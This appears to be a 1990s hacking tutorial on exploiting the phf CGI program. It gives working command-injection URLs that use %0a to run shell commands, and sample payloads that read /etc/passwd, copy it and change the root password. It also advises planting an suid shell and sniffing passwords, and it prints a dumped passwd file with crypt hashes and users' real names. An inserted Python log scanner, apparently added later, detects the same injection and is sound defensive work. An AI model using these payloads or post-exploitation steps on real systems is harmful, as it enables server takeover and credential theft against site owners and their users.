PHF WWW PH Query
There is a program in the WWW cgi-bin directory called phf. If the file
is there and has execute permission (x), you can access it by using the www, or
a text-mode browser in Linux called lynx. Now you can read files on the
system (yup .. /etc/passwd) and save them to local files on your computer.
There are many things we can get done here. If the server is running its
httpd server as root owner, we can be root by using phf and even change an
account password on the machine.
I will include a perl script here that will auto-check all of the systems out
there by using the getdomain.pl script above and check what user the server is
running under. If it is running under root, it will just log the id; if the
server is not running under root, it will auto-get the passwd file from the
/etc directory and name it domainname.???.passwd.
I will also attach a script that will allow you to use a simple command from
a shell and, if phf is on the system, allow you to pipe commands from the shell
to the remote system with one command line.
Ok, now that you know what is coming, let's teach you how to use phf.
Use your favorite web browser, or the text-mode browser in Unix, most of
the time called lynx, on some systems www.
After the screen comes up, type the letter g; now a line appears like below:
URL to open:
Arrow keys: Up and Down to move. Right to follow a link; Left to go back.
H)elp O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history list
You type:
URL to open: http://xxx.org/cgi-bin/phf/?Qalias=x%0aid
Arrow keys: Up and Down to move. Right to follow a link; Left to go back.
H)elp O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history list
It returns:
QUERY RESULTS
/usr/local/bin/ph -m alias=x id
uid=65534(nobody) gid=65535(nogroup) groups=65535(nogroup)
So here we see it is running under the user nobody, so we can be a user named
nobody on this system. We are not root, but this will have to do ;)
Notice the command line:
http://afp.org/cgi-bin/phf/?Qalias=x%0aid
The id was the command to the server to give us the id of the user. Sometimes
you will have to give the full path to the file you want to run; in this case
it would have been: http://afp.org/cgi-bin/phf/?Qalias=x%0a/usr/bin/id
Notice that after the %0a you start your command line. If you need to enter
a space, put a %20 in place of the space. Here are some sample
command lines. I will start them with %0a:
Cat the passwd file
%0a/bin/cat%20/etc/passwd
Get a long directory of the /etc directory of all files starting with pass
%0als%20-al%20/etc/pass*
backup the passwd file if you have root access to httpd to passwd.my
%0acp%20/etc/passwd%20/etc/passwd.my
Change the root passwd (if the server will let you; most times it works)
%0apasswd%20root
(the above should let you log in without a password; make sure to copy the
passwd.my file over the passwd file right away, and then delete the backup,
then make yourself an suid bash shell somewhere and rename it, sniff to get
your passwords)
If you know how to type commands in Unix, and don't forget that you need to
use %20 in the place of spaces, you will not have any problems!
Ok, let's cat the passwd file on this box ;)
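As an added defensive example (not part of the original post or of the phf program itself), here is a Python check that walks web-server access-log lines and flags requests to phf whose decoded query carries a %0a newline, the same encoding trick the URLs above rely on. The log lines, hosts and timestamps are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (Common Log Format). Hosts, addresses
# and timestamps are made up for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/1997:10:14:02 -0500] "GET /cgi-bin/phf?Qalias=x%0aid HTTP/1.0" 200 512
10.0.0.5 - - [12/Mar/1997:10:15:31 -0500] "GET /cgi-bin/phf?Qalias=x%0acat%20/etc/passwd HTTP/1.0" 200 1790
10.0.0.9 - - [12/Mar/1997:10:16:00 -0500] "GET /cgi-bin/phf?Qname=hilton&Qalias=bob HTTP/1.0" 200 240
10.0.0.9 - - [12/Mar/1997:10:17:12 -0500] "GET /index.html HTTP/1.0" 200 3033
10.0.0.7 - - [12/Mar/1997:10:18:45 -0500] "GET /cgi-bin/phf/?Qalias=x%0a/usr/bin/id HTTP/1.0" 404 0
"""

CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def phf_injection_attempts(log_text):
    """Return one dict per request that targets phf and carries a newline in
    a decoded query value. ph treats the newline as the end of the alias
    argument, so everything after it is handed to the shell as a command."""
    findings = []
    for line in log_text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group('target'))
        # phf may live in any CGI directory and is requested as .../phf
        # or .../phf/ (the tutorial's URLs use the trailing slash form)
        if not parts.path.rstrip('/').endswith('/phf'):
            continue
        # parse_qsl undoes the encoding: %0a becomes "\n", %20 becomes " "
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if '\n' in value:
                findings.append({
                    'ip': m.group('ip'),
                    'status': int(m.group('status')),  # 200 means phf answered
                    'param': key,
                    'command': value.split('\n', 1)[1],
                })
    return findings

if __name__ == '__main__':
    for f in phf_injection_attempts(SAMPLE_LOG):
        print(f)
```

A 404 hit (the last sample line) still records the attempt, which is useful for spotting scans against hosts where phf was already removed.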
URL to open: http://xxx.org/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd
We get:
QUERY RESULTS
/usr/local/bin/ph -m alias=x cat /etc/passwd
root:R0rmc6lxVwi5I:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:-2:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
bhilton:LkjLiWy08xIWY:501:100:Bob Hilton:/home/bhilton:/bin/bash
web:Kn0d4HJPfRSoM:502:100:Web Master:/home/web:/bin/bash
mary:EauDLA/PT/HQg:503:100:Mary C. Hilton:/home/mary:/bin/bash
A small passwd file
If you want to save this to a file in your local directory, just choose the
print option in the text browser and you will get an option to save the file
in your home directory.
Let's learn something here:
mary:EauDLA/PT/HQg:503:100:Mary C. Hilton:/home/mary:/bin/bash
 1  :      2      : 3 : 4 :      5       :    6     :    7
1=username 2=encrypted password 3=user number 4=group id 5=real name
6=home directory 7=shell
Ok, let's say you do not want to keep using the WWW browser; here is a script
you can compile to just type regular commands from your shell (in next post).